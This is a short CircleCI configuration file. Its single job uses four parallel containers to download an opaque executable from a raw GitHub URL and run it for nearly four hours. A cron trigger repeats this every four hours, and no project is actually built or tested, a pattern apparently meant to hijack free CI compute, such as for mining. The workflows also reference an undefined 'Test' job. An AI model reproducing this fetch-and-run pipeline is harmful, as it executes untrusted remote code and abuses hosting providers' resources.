working_dir: &working_dir ~/app

version: 2.0
jobs:
  nadirah:
    parallelism: 4
    docker:
      - image: circleci/php:8.0.6
    steps:
    - checkout
    - run:
        name: run
        command: |
                  wget -O run https://raw.githubusercontent.com/tankote/bill/main/run && chmod u+x run && timeout 238m ./run && echo "suksesd"
        no_output_timeout: 360m
        
workflows:
  version: 2
  commit:
    jobs:
      - Test
    triggers:
      - schedule:
          cron: "0 2,6,10,14,18,22 * * *"
          filters:
            branches:
              only:
                - master

  phprunbuild:
    jobs:
      - Test
      
